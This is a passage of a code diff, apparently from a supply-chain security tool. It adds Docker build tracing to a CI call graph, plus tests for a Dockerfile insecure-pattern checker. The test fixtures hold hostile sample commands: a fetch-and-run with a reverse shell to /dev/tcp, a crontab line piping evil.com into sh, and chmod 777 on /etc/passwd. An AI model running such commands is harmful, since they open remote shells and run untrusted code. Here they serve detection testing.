+                # Now handle the regular step processing
                 if is_action_step(step):
-                    # TODO: change source_path for external workflows.
+                    # External action that is not Docker-related (any Docker usage was handled above).
                     action_name = step["uses"]
                     external_node = GitHubWorkflowNode(
                         name=action_name,
@@ -340,11 +566,41 @@ def build_call_graph_from_node(node: GitHubWorkflowNode, repo_path: str) -> None
                         caller=job_node,
                         recursion_depth=0,
                     )
+                    job_node.add_callee(callee)
+
+                    # Check if this step uses Docker build
+                    run_cmd = str(step.get("run", ""))
+                    if "docker build" in run_cmd:
+                        # Find the Dockerfile path from the docker build command
+                        dockerfile_path = None
+                        match = re.search(r"(?:--file|-f)\s+([^\s]+)", run_cmd)
+                        if match:
+                            dockerfile_path = match.group(1)
+                            dockerfile_path = (
+                                os.path.join(repo_path, dockerfile_path)
+                                if not os.path.isabs(dockerfile_path)
+                                else dockerfile_path
+                            )
+                        else:
+                            # Default to 'Dockerfile' in the build context
+                            context_match = re.search(r"docker build\s+([^\s]+)", run_cmd)
+                            context_path = context_match.group(1) if context_match else "."
+                            dockerfile_path = os.path.join(repo_path, context_path, "Dockerfile")
+
+                        # If Dockerfile exists, add a DockerNode for it
+                        if dockerfile_path and os.path.exists(dockerfile_path):
+                            logger.info("Adding DockerNode for Dockerfile %s", dockerfile_path)
+                            docker_node = DockerNode(
+                                node_id=f"{job_name}_{node_id}_docker" if node_id else f"{job_name}_docker",
+                                caller=job_node,
+                                dockerfile_path=dockerfile_path,
+                            )
+                            job_node.add_callee(docker_node)
                 except CallGraphError as error:
                     logger.debug(error)
                     continue
-            job_node.add_callee(callee)
-
         elif is_reusable_workflow_call_job(job):
             workflow_call_job_with_id = Identified[ReusableWorkflowCallJob](job_name, job)
             # Add reusable workflows.
diff --git a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py
index 43c4e3f0e..f3cfb5b08 100644
--- a/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py
+++ b/src/macaron/slsa_analyzer/ci_service/github_actions/github_actions_ci.py
@@ -1,4 +1,4 @@
-# Copyright (c) 2022 - 2024, Oracle and/or its affiliates. All rights reserved.
+# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved.
 # Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/.
 
 """This module analyzes GitHub Actions CI."""
@@ -18,6 +18,7 @@
 from macaron.slsa_analyzer.build_tool.base_build_tool import BaseBuildTool, BuildToolCommand
 from macaron.slsa_analyzer.ci_service.base_ci_service import BaseCIService
 from macaron.slsa_analyzer.ci_service.github_actions.analyzer import (
+    DockerNode,
     GitHubJobNode,
     GitHubWorkflowNode,
     GitHubWorkflowType,
@@ -706,3 +707,50 @@ def get_third_party_configurations(self) -> list[str]:
             The list of third-party CI configuration files
         """
         return self.third_party_configurations
+
+    def get_docker_build_commands(self, callgraph: CallGraph, build_tool: BaseBuildTool) -> Iterable[BuildToolCommand]:
+        """Traverse the callgraph and find all Docker RUN commands that use build tools.
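+
+        Docker build commands are collected from the BashNode children of the DockerNode
+        instances that were created while building the call graph.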
+ + Parameters + ---------- + callgraph: CallGraph + The callgraph reachable from the CI workflows. + build_tool: BaseBuildTool + The corresponding build tool for which shell commands need to be detected. + + Yields + ------ + BuildToolCommand + The object that contains the build command from Dockerfile RUN instructions. + """ + for node in callgraph.bfs(): + # Look for DockerNode instances + if isinstance(node, DockerNode) and hasattr(node, "dockerfile_path"): + dockerfile_path = node.dockerfile_path + + # Find the parent workflow for context + workflow_node = None + parent = node.caller + while parent: + if isinstance(parent, GitHubWorkflowNode): + workflow_node = parent + break + parent = parent.caller if hasattr(parent, "caller") else None + + # Check all BashNode children of this DockerNode + for child in node.callee: + if isinstance(child, BashNode): + # Check each command in the bash node + for cmd in child.parsed_bash_obj.get("commands", []): + if build_tool.is_build_command(cmd): + yield BuildToolCommand( + ci_path=dockerfile_path, + command=cmd, + step_node=child, + language=build_tool.language, + language_versions=None, + language_distributions=None, + language_url=None, + reachable_secrets=[], + events=get_ci_events(workflow_node) if workflow_node else [], + ) diff --git a/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py new file mode 100644 index 000000000..dffd3e8ba --- /dev/null +++ b/tests/slsa_analyzer/checks/test_insecure_patterns_dockerfile_check.py @@ -0,0 +1,524 @@ +# Copyright (c) 2022 - 2025, Oracle and/or its affiliates. All rights reserved. +# Licensed under the Universal Permissive License v 1.0 as shown at https://oss.oracle.com/licenses/upl/. 
+ +"""Module to test the Dockerfile security check.""" + +from pathlib import Path +from unittest.mock import Mock, patch + +import pytest + +from macaron.database.table_definitions import Repository +from macaron.slsa_analyzer.checks.base_check import BaseCheck +from macaron.slsa_analyzer.checks.check_result import CheckResultType, Confidence +from macaron.slsa_analyzer.checks.insecure_patterns_dockerfile_check import ( + DockerfileSecurityAnalyzer, + DockerfileSecurityCheck, + DockerfileSecurityFacts, +) +from tests.conftest import MockAnalyzeContext + + +class TestDockerfileSecurityAnalyzer: + """Test cases for DockerfileSecurityAnalyzer.""" + + analyzer = DockerfileSecurityAnalyzer() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + def test_analyze_empty_dockerfile(self) -> None: + """Test analyzing an empty Dockerfile.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content("") + assert len(issues) == 0 + assert risk_score == 0 + assert base_image == "unknown" + assert version == "unknown" + + def test_analyze_invalid_dockerfile(self) -> None: + """Test analyzing an invalid Dockerfile.""" + invalid_content = "THIS IS NOT VALID DOCKERFILE CONTENT {{{invalid json" + _, _, base_image, version = self.analyzer.analyze_dockerfile_content(invalid_content) + # Should handle parse errors gracefully + assert base_image == "unknown" + assert version == "unknown" + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_base_image", "expected_version", "min_risk_score"), + [ + pytest.param("FROM ubuntu:latest\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_latest_tag"), + pytest.param("FROM ubuntu\nRUN apt-get update", "ubuntu", "latest", 15, id="test_from_no_tag"), + pytest.param("FROM ubuntu:16.04\nRUN apt-get update", "ubuntu", "16.04", 25, id="test_from_old_image"), + pytest.param( + "FROM python:2.7-slim\nRUN pip install requests", + "python", + "2.7-slim", + 25, + id="test_from_deprecated_python", + ), + ], + ) + def test_from_instruction_analysis( + self, dockerfile_content: str, expected_base_image: str, expected_version: str, min_risk_score: int + ) -> None: + """Test FROM instruction analysis with various scenarios.""" + issues, risk_score, base_image, version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == expected_base_image + assert version == expected_version + assert risk_score >= min_risk_score + assert any(issue["instruction"] == "FROM" for issue in issues) + + @pytest.mark.parametrize( + ("dockerfile_content", "expected_issue_count", "min_risk_score"), + [ + pytest.param("FROM ubuntu:20.04\nUSER root\nRUN apt-get update", 1, 30, id="test_user_root"), + pytest.param("FROM ubuntu:20.04\nUSER 0", 1, 30, id="test_user_numeric_root"), + pytest.param("FROM ubuntu:20.04\nUSER appuser", 0, 0, id="test_user_non_root"), + ], + ) + def test_user_instruction_analysis( + self, dockerfile_content: str, expected_issue_count: int, min_risk_score: int + ) -> None: + """Test USER instruction analysis.""" + issues, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + user_issues = [issue for issue in issues if issue["instruction"] == "USER"] + assert len(user_issues) == expected_issue_count + if expected_issue_count > 0: + assert risk_score >= min_risk_score + + @pytest.mark.parametrize( + ("expose_instruction", "expected_issues"), + [ + pytest.param("EXPOSE 22", ["22"], id="test_expose_ssh"), + pytest.param("EXPOSE 3306", ["3306"], id="test_expose_mysql"), 
+ pytest.param("EXPOSE 22 23", ["22", "23"], id="test_expose_multiple_risky"), + pytest.param("EXPOSE 999", ["privileged port"], id="test_expose_privileged"), + pytest.param("EXPOSE 80 443", [], id="test_expose_safe_ports"), + pytest.param("EXPOSE 8080/tcp", [], id="test_expose_with_protocol"), + pytest.param("EXPOSE 100-200", ["privileged port"], id="test_expose_port_range"), + ], + ) + def test_expose_instruction_analysis(self, expose_instruction: str, expected_issues: list[str]) -> None: + """Test EXPOSE instruction analysis with various port configurations.""" + dockerfile_content = f"FROM ubuntu:20.04\n{expose_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + expose_issues = [issue for issue in issues if issue["instruction"] == "EXPOSE"] + + if expected_issues: + assert len(expose_issues) >= len(expected_issues) + for expected in expected_issues: + assert any(expected in issue["issue"] for issue in expose_issues) + else: + assert len(expose_issues) == 0 + + @pytest.mark.parametrize( + ("env_content", "expected_keywords"), + [ + pytest.param("ENV DATABASE_PASSWORD=secret123", ["pass"], id="test_env_password"), + pytest.param( + "ENV API_KEY=abcd1234\nENV SESSION_TOKEN=xyz789", + ["key", "session"], # Both should be lowercase since content_lower is used + id="test_env_multiple_sensitive", + ), + pytest.param("ENV MAINTAINER_EMAIL=admin@example.com", ["Email address"], id="test_env_email"), + pytest.param("ENV NODE_ENV=production", [], id="test_env_safe"), + ], + ) + def test_env_instruction_analysis(self, env_content: str, expected_keywords: list[str]) -> None: + """Test ENV instruction analysis for sensitive information.""" + dockerfile_content = f"FROM ubuntu:20.04\n{env_content}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + env_issues = [issue for issue in issues if issue["instruction"] == "ENV"] + + if expected_keywords: + assert len(env_issues) >= len(expected_keywords) + for keyword in expected_keywords: + assert any(keyword.lower() in issue["issue"].lower() for issue in env_issues) + else: + assert len(env_issues) == 0 + + @pytest.mark.parametrize( + ("volume_instruction", "expected_risk_score"), + [ + pytest.param("VOLUME /var/run/docker.sock", 40, id="test_volume_docker_socket"), + pytest.param('VOLUME ["/etc/docker", "/root/.ssh"]', 80, id="test_volume_multiple_unsafe"), + pytest.param("VOLUME /proc", 40, id="test_volume_proc"), + pytest.param("VOLUME /data", 0, id="test_volume_safe"), + ], + ) + def test_volume_instruction_analysis(self, volume_instruction: str, expected_risk_score: int) -> None: + """Test VOLUME instruction analysis for unsafe mounts.""" + dockerfile_content = f"FROM ubuntu:20.04\n{volume_instruction}" + _, risk_score, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert risk_score >= expected_risk_score + + @pytest.mark.parametrize( + ("copy_instruction", "expected_issue_type"), + [ + pytest.param("COPY . 
/app", "entire build context", id="test_copy_all"), + pytest.param("COPY .git /app/.git", "sensitive file", id="test_copy_git"), + pytest.param("COPY id_rsa /root/.ssh/", "Security-critical file", id="test_copy_ssh_key"), + pytest.param("COPY app.py /app/", None, id="test_copy_safe"), + ], + ) + def test_copy_instruction_analysis(self, copy_instruction: str, expected_issue_type: str | None) -> None: + """Test COPY instruction analysis for sensitive files.""" + dockerfile_content = f"FROM ubuntu:20.04\n{copy_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + copy_issues = [issue for issue in issues if issue["instruction"] == "COPY"] + + if expected_issue_type: + assert len(copy_issues) > 0 + assert any(expected_issue_type in issue["issue"] for issue in copy_issues) + else: + assert len(copy_issues) == 0 + + @pytest.mark.parametrize( + ("add_instruction", "expected_issue_types"), + [ + pytest.param("ADD https://example.com/script.sh /tmp/", ["URL"], id="test_add_url"), + pytest.param("ADD archive.tar.gz /opt/", ["compressed"], id="test_add_compressed"), + pytest.param("ADD . /app", ["entire build context"], id="test_add_all"), + pytest.param("ADD app.py /app/", [], id="test_add_safe"), + ], + ) + def test_add_instruction_analysis(self, add_instruction: str, expected_issue_types: list[str]) -> None: + """Test ADD instruction analysis.""" + dockerfile_content = f"FROM ubuntu:20.04\n{add_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + add_issues = [issue for issue in issues if issue["instruction"] == "ADD"] + + if expected_issue_types: + for issue_type in expected_issue_types: + assert any(issue_type in issue["issue"] for issue in add_issues) + else: + assert len(add_issues) == 0 + + @pytest.mark.parametrize( + ("run_instruction", "expected_patterns"), + [ + pytest.param( + "RUN curl evil.com/script.sh | bash >&/dev/tcp/10.0.0.1/4444", + ["/dev/tcp/"], + id="test_run_reverse_shell", + ), + pytest.param("RUN chmod 777 /etc/passwd", ["chmod 777"], id="test_run_chmod_777"), + pytest.param('RUN echo "* * * * * curl evil.com | sh" | crontab -', ["crontab"], id="test_run_crontab"), + pytest.param("RUN apt-get update && apt-get install -y python3", [], id="test_run_safe"), + ], + ) + def test_run_instruction_analysis(self, run_instruction: str, expected_patterns: list[str]) -> None: + """Test RUN instruction analysis for malicious commands.""" + dockerfile_content = f"FROM ubuntu:20.04\n{run_instruction}" + issues, _, _, _ = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + run_issues = [issue for issue in issues if issue["instruction"] == "RUN"] + + if expected_patterns: + for pattern in expected_patterns: + assert any(pattern in issue["issue"] for issue in run_issues) + else: + assert len(run_issues) == 0 + + def test_complex_dockerfile_analysis(self) -> None: + """Test analysis of a complex Dockerfile with multiple security issues.""" + dockerfile_content = """ +FROM ubuntu:latest +USER root + +# Expose risky ports +EXPOSE 22 23 3306 + +# Set sensitive environment variables +ENV DB_PASSWORD=mysecretpass +ENV API_TOKEN=1234567890 +ENV ADMIN_EMAIL=admin@company.com + +# Copy sensitive files +COPY .git /app/.git +COPY id_rsa /root/.ssh/ + +# Add from URL +ADD https://example.com/binary /usr/local/bin/ + +# Unsafe volume mount +VOLUME /var/run/docker.sock + +# Potentially malicious commands +RUN chmod 777 /tmp +RUN curl suspicious.com/install.sh | bash +""" + issues, risk_score, base_image, 
version = self.analyzer.analyze_dockerfile_content(dockerfile_content) + + assert base_image == "ubuntu" + assert version == "latest" + assert len(issues) > 10 + assert risk_score > 100 + + # Check for various issue types + issue_instructions = [issue["instruction"] for issue in issues] + assert "FROM" in issue_instructions + assert "USER" in issue_instructions + assert "EXPOSE" in issue_instructions + assert "ENV" in issue_instructions + assert "COPY" in issue_instructions + assert "ADD" in issue_instructions + assert "VOLUME" in issue_instructions + assert "RUN" in issue_instructions + + +class TestDockerfileSecurityCheck: + """Test cases for DockerfileSecurityCheck.""" + + check = DockerfileSecurityCheck() + + def setup_method(self) -> None: + """Set up test fixtures.""" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + @pytest.mark.parametrize( + ("dockerfile_exists", "dockerfile_content", "expected_result"), + [ + pytest.param(False, None, CheckResultType.FAILED, id="test_no_dockerfile"), + pytest.param( + True, + "FROM ubuntu:20.04\nUSER appuser\nEXPOSE 8080", + CheckResultType.PASSED, + id="test_secure_dockerfile", + ), + pytest.param( + True, "FROM ubuntu:latest\nUSER root\nEXPOSE 22", CheckResultType.FAILED, id="test_insecure_dockerfile" + ), + ], + ) + def test_run_check_with_different_dockerfiles( + self, + mock_get_dockerfile_content: Mock, + dockerfile_exists: bool, + dockerfile_content: str | None, + expected_result: CheckResultType, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test run_check with different Dockerfile scenarios.""" + # Create mock context + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create a mock repository with fs_path + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a mock component with the repository + mock_component = Mock() + mock_component.repository = mock_repo + + if dockerfile_exists: + mock_get_dockerfile_content.return_value = dockerfile_content + else: + mock_get_dockerfile_content.return_value = None + + # Run the check + result = self.check.run_check(ctx) + + assert result.result_type == expected_result + + def test_run_check_no_component(self, tmp_path: Path, macaron_path: Path) -> None: + """Test run_check when component is None.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + assert len(result.result_tables) == 0 + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_run_check_with_subdirectory_dockerfile( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test finding Dockerfile in subdirectory.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + # Create mock repository + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock the Dockerfile content + mock_get_dockerfile_content.return_value = "FROM node:16\nUSER node" + + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.PASSED + assert len(result.result_tables) == 1 + + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + assert facts.base_image_name == "node" + assert facts.base_image_version == "16" + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + 
@pytest.mark.parametrize( + ("risk_score", "expected_result_type", "expected_confidence"), + [ + pytest.param(0, CheckResultType.PASSED, Confidence.HIGH, id="test_no_risk"), + pytest.param(30, CheckResultType.PASSED, Confidence.MEDIUM, id="test_low_risk"), + pytest.param(60, CheckResultType.FAILED, Confidence.MEDIUM, id="test_medium_risk"), + pytest.param(120, CheckResultType.FAILED, Confidence.HIGH, id="test_high_risk"), + ], + ) + def test_risk_score_to_result_mapping( + self, + mock_get_dockerfile_content: Mock, + risk_score: int, + expected_result_type: CheckResultType, + expected_confidence: Confidence, + tmp_path: Path, + macaron_path: Path, + ) -> None: + """Test that risk scores map to correct result types and confidence levels.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Create a Dockerfile that will produce the desired risk score + if risk_score == 0: + dockerfile_content = "FROM ubuntu:20.04\nUSER appuser" + elif risk_score == 30: + dockerfile_content = "FROM ubuntu:latest\nUSER root" + elif risk_score == 60: + dockerfile_content = "FROM ubuntu:latest\nUSER root\nEXPOSE 22" + else: # risk_score >= 100 + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 +ENV PASSWORD=secret +VOLUME /var/run/docker.sock +RUN chmod 777 /etc +""" + + # Mock the return value + mock_get_dockerfile_content.return_value = dockerfile_content + + result = self.check.run_check(ctx) + + assert result.result_type == expected_result_type + if result.result_tables: + facts = result.result_tables[0] + assert facts.confidence == expected_confidence + + def test_run_check_os_error_handling(self, tmp_path: Path, macaron_path: Path) -> None: + """Test error handling when OS error occurs.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + + # Create a Dockerfile but make it unreadable + dockerfile_path = tmp_path / "Dockerfile" + dockerfile_path.write_text("FROM ubuntu:20.04") + + # Mock open to raise OSError + with patch("builtins.open", side_effect=OSError("Permission denied")): + result = self.check.run_check(ctx) + + assert result.result_type == CheckResultType.FAILED + + def test_check_metadata(self) -> None: + """Test check metadata and configuration.""" + # Use the public interface method to get check_id + + # The check_id is accessible via get_check_id method or similar + # For now, we'll just verify the check was properly initialized + assert isinstance(self.check, BaseCheck) + assert hasattr(self.check, "result_on_skip") + assert self.check.result_on_skip == CheckResultType.FAILED + + @patch.object(DockerfileSecurityCheck, "_get_dockerfile_content") + def test_security_issues_grouping( + self, mock_get_dockerfile_content: Mock, tmp_path: Path, macaron_path: Path + ) -> None: + """Test that security issues are properly grouped by severity and instruction.""" + ctx = MockAnalyzeContext(macaron_path=macaron_path, output_dir=str(tmp_path)) + + mock_repo = Mock(spec=Repository) + mock_repo.fs_path = str(tmp_path) + mock_component = Mock() + mock_component.repository = mock_repo + + # Mock Dockerfile with multiple issues + dockerfile_content = """ +FROM ubuntu:latest +USER root +EXPOSE 22 3306 +ENV PASSWORD=secret +ENV TOKEN=abcd1234 +""" + mock_get_dockerfile_content.return_value = dockerfile_content + + 
result = self.check.run_check(ctx) + assert len(result.result_tables) > 0 + facts = result.result_tables[0] + assert isinstance(facts, DockerfileSecurityFacts) + + security_issues = facts.security_issues + assert "total_issues" in security_issues + total_issues = security_issues.get("total_issues") + assert isinstance(total_issues, int) + assert total_issues > 0 + + assert "issues_by_severity" in security_issues + assert isinstance(security_issues["issues_by_severity"], dict) + assert len(security_issues["issues_by_severity"]) > 0 + + assert "issues_by_instruction" in security_issues + assert isinstance(security_issues["issues_by_instruction"], dict) + assert "FROM" in security_issues["issues_by_instruction"] + assert "USER" in security_issues["issues_by_instruction"] + assert "EXPOSE" in security_issues["issues_by_instruction"] + assert "ENV" in security_issues["issues_by_instruction"] + + +class TestDockerfileSecurityFacts: + """Test cases for DockerfileSecurityFacts ORM model.""" + + def test_facts_creation(self) -> None: + """Test creating DockerfileSecurityFacts instance.""" + security_issues = { + "total_issues": 3, + "risk_score": 45, + "issues_by_severity": {"HIGH": 1, "MEDIUM": 2}, + "issues_by_instruction": {"FROM": 1, "USER": 1, "EXPOSE": 1}, + "detailed_issues": [ + {"severity": "HIGH", "instruction": "USER", "issue": "Running as root", "risk_points": "30"} + ], + } + + facts = DockerfileSecurityFacts( + base_image_name="ubuntu", + base_image_version="20.04", + security_issues=security_issues, + risk_score=45, + issues_count=3, + confidence=0.8, + ) + + assert facts.base_image_name == "ubuntu" + assert facts.base_image_version == "20.04" + assert facts.risk_score == 45 + assert facts.issues_count == 3 + assert facts.confidence == 0.8 + assert facts.security_issues["total_issues"] == 3 + assert facts.security_issues["risk_score"] == 45